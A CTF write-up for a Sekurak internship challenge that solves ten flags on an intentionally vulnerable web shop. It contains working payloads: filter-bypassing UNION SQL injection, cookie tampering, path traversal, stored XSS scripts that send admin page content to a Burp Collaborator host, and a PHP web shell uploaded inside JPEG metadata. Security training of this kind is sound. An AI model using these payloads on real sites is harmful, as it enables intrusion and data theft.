Sekurak Próba 5 Tygodni Challenge
Writeup for Próba 5 Tygodni Challenge From Sekurak Hacker Adept Intership
Challenge Description
The task was to obtain 10 hidden flags on a vulnerable website. The flag format is:
flag{proba5tygodniSOME_TEXT_OR_NUMBERS_HERE}
Let’s get started!
Flag 1
The first thing I did was check the source code of the page with CTRL + U.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Not Vulnerable WebShop</title>
<link rel="stylesheet" href="css/style.css">
<link rel="robots" href="robots.txt">
<script src="https://www.google.com/recaptcha/enterprise.js?render=6Lcq-bkpAAAAAIYqSYnAmq9J0Rs3CfqpDf1l4XVc" type="ffdf2ff9ce94e2563c9254e6-text/javascript"></script>
</head>
<body>
<nav>
<ul>
<li><a href="./?page=home">Strona główna</a></li>
<li><a href="./?page=login">Logowanie</a></li>
<li><a href="./?page=register">Rejestracja</a></li>
<li><a href="./?page=products">Katalog produktów</a></li>
<li><a href="./?page=cart">Koszyk</a></li>
<li><a href="./?page=contact">Kontakt</a></li>
</ul>
</nav>
<div class="container">
<section>
<h2>Witaj w Not Vulnerable WebShop!</h2>
<p>Nasz sklep oferuje bezpieczne produkty, takie jak bezpieczny kubek bez dziur.</p>
<br>
<h2>Informacja dla uczestników stażu...</h2>
<p>Programy automatyzujące prace są zakazane podobnie jak w etapie pierwszym, nie banujemy za ich używanie, za to bardzo utrudniamy ich użycie!</p>
<p>Cała strona jest za CloudFlare, narzucony jest Rate Limitting, dodatkowo istotne funkcjonalności posiadają Captche, bye bye automatic scanner.</p>
<hr>
<button id="generateFlagButton">Wygeneruj flagę do agregatora</button>
<script type="ffdf2ff9ce94e2563c9254e6-text/javascript">
document.getElementById('generateFlagButton').addEventListener('click', function() {
document.location.href = './agregator.php';
});
</script>
</section>
</div>
<footer>
<p>© 2024 Not Vulnerable WebShop. All rights reserved.</p>
<p>Głodny? Lodówka jest <a href="./lodowka.html" style="color: #fff; text-decoration: none;">tutaj</a></p>
</footer><script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="ffdf2ff9ce94e2563c9254e6-|49" defer></script></body>
</html>
We immediately see there’s a robots.txt file. Let’s check it out. It’s always one of the first things I do during a pentest.
1
2
3
User-agent: *
Disallow: /
# Fajnie, ze ktos tu zaglada - flaga: flag{proba5tygodni[1][PlikiRobotsTezSaWazne]}
The first flag is ours!
flag{proba5tygodni[1][PlikiRobotsTezSaWazne]}
Flag 2
After finding the first flag and looking at the source code, I went straight to the product catalog which showed me the product page.
After clicking “Details,” we see the URL:
https://proba5tygodni.safety-online.pl/?page=product_details&id=1
So immediately, I thought about enumerating IDs like 1, 2, 3, and so on. On ID 7, I found something interesting.
flag{proba5tygodni[2][DobrePaginacjeNigdyNieSaZle]}
Flag 3
Next, I wanted to check the login functionality. After trying some SQL injection payloads, I noticed that during login, you can check the “Remember me” checkbox. When we create an account and log in with it, we get a value like:
I thought maybe if I changed it to some arbitrary value like 0 or 1, it could get me admin access. And it did! After changing the remember cookie to the value 1, I got this:
flag{proba5tygodni[3][AdminToDobryZiomLogujemySie]}
Flag 4
Now that we have access to the admin panel, we can check for more interesting things. Let’s take a look at the File Manager functionality.
We can check .txt files with it, but .php files are not allowed to view. Here is an example path:
https://proba5tygodni.safety-online.pl/?page=panel&option=manager&path=/data/dokument1.txt
Curious eyes can immediately spot a potential place for path traversal. So did I. After changing the URL to:
https://proba5tygodni.safety-online.pl/?page=panel&option=manager&path=/data/..
we got this:
After searching for some interesting files, I found this one:
https://proba5tygodni.safety-online.pl/?page=panel&option=manager&path=/data/../files/dluga_nazwa_pliku_z_sekretem.txt
And there it is:
flag{proba5tygodni[4][PathTraversalBywaNaprawdeOkej]}
Flag 5
While checking the possible directories and files, I saw a pages directory with a file called confidential.php. I tried to go directly to that file via the URL: https://proba5tygodni.safety-online.pl/?page=confidential
But i got this:
That’s interesting. So let’s try to craft one like privileged=true and send the request using Burp.
After sending the request, we got:
flag{proba5tygodni[5][LFIPlusCiastkaTakaNowosc]}
Flag 6
Back in the admin panel, we have the Users page with a search input for showing a specific user. The first thing to try is some SQL injection. Let’s start with '.
Ok, we know something based on the error message. We need to close two parentheses and then comment it out. Let’s try '))#. Ok, we got no error, so I think it works. Now let’s check the number of columns by using ORDER BY. Our payload will look like ')) ORDER BY 1#. With ')) ORDER BY 6#, I got an error, which means there are five columns selected.
Now we need to use UNION to retrieve some data. So we can try: ')) UNION SELECT 1,2,3,4,5# But we get an error message:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1,2,3,4,5#%' AND password IS NOT NULL) AND 1=1)' at line 1
So it looks like the SELECT word is being cut out. After trying some bypasses, this one worked: ')) UNION SELSELECTECT 1,2,3,4,5#. The ‘inner’ SELECT is being cut out, and the rest concatenate to form ‘SELECT’ again.
This payload gave me table names:
')) UNION SELSELECTECT table_name, 2, 3, 4, 5 FROM information_schema.tables#
There are tables like products and accounts, but one is called confidential_data, which is interesting.
' )) UNION SELSELECTECT column_name,2,3,4,5 FROM information_schema.columns WHERE table_name='confidential_data'#
The column name is flag, so now it’s just a formality to do the rest.
')) UNION SELSELECTECT flag,2,3,4,5 FROM confidential_data#
And there’s our flag:
flag{proba5tygodni[6][SQLPonownieCiePowital!]}
Flag 7
In our application, we can buy things, and there’s a standard e-commerce cart process. During a few tests of making an order, I tried to intercept the /?page=order&action=process POST request which has the following body: order[2][quantity]=1. This made me think if I could change the numbers to lower the price or even make a free order, and indeed I could.
Notice the 0 there. In the response, we can see:
flag{proba5tygodni[7][DarmoweZakupyLubieJe.!]}
Flag 8
The page also has a contact form where we can send a message to the website administrator. Then, we are notified that the admin will review our message. So we have Stored XSS. When I sent <script>prompt(1)</script>,
I noticed a significant delay in response, which I think proves XSS.
I crafted a payload using my Burp Collaborator:
<img src="x" onerror="this.src='https://COLLABORATOR?html='+encodeURIComponent(document.documentElement.innerHTML);this.onerror=null;">
In the response, I got this URL encoded HTML of a webpage which, after decoding, looks like this:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Panel Administratora</title>
<style>footer,header{background-color:#333;color:#fff}footer,header,nav{padding:10px;text-align:center}body{font-family:Arial,sans-serif;margin:0;padding:0}nav{background-color:#f4f4f4}nav a{text-decoration:none;color:#333;margin:0 10px}nav a:hover{text-decoration:underline}footer{position:fixed;bottom:0;width:100%}</style>
</head>
<body>
<header>
<h1>Panel Administratora</h1>
</header>
<nav>
<a href="./" class="active">Panel</a>
<a href="./?page=add_new_admin">Dodaj nowego administratora</a>
<a href="#">Wyloguj</a>
</nav>
<main>
<section>
<h2>Ostatnia wiadomoÅÄ do administratora</h2>
<!-- Tutaj umieÅÄ treÅÄ ostatniej wiadomoÅci -->
<p>Pytanie użytkownika: <img src="x" onerror="this.src='https://COLLABORATOR?html=' encodeURIComponent(document.documentElement.innerHTML);this.onerror=null;"> <br></p></section>
</main>
<footer>
(C) Not Vulnerable WebShop Secret Admin Panel
</footer>
</body>
So we have an endpoint /?page=add_new_admin. I tried to access it directly with my browser, tried to make Host: localhost, etc., but nothing worked. So I thought I needed to use XSS to actually go to that specific page and then send the result back to me. Let’s use the collaborator again with some simple JavaScript:
1
2
3
4
5
6
7
8
9
10
11
12
<script>var xhr = new XMLHttpRequest();
xhr.onreadystatechange = () => {
if (xhr.readyState == XMLHttpRequest.DONE) {
var xhr_exfil = new XMLHttpRequest();
xhr_exfil.open('POST', "https://COLLABORATOR", false);
xhr_exfil.send(xhr.response);
}
};
xhr.open('GET', "/niedostepny_zzewnatrz123ojnie/?page=add_new_admin", false);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send();
</script>
And the collaborator received this request:
flag{proba5tygodni[8][BoBlindXSSToNieTylkoCzytanie]}
Flag 9
When we look at the products page while logged in as an admin, we see that we can edit them.
After clicking the link, we get another flag for free.
flag{proba5tygodni[9][NaAdminieTezWartoSprawdzacInnePodstrony]}
Flag 10
We can edit our profile by uploading an avatar.
But the web app is not properly checking the uploaded file because we can upload, for example, a JPEG with PHP code in the comment section. We can do it via exiftool like this:
exiftool -Comment="<?php system($_GET['cmd']); ?>
Then we intercept the request for the upload, change the filename to test.php, change the Content-Type to
image/jpeg,
and forward it.
As a response, we get the last flag:
flag{proba5tygodni[10][WebShellNiejestMiObcy]}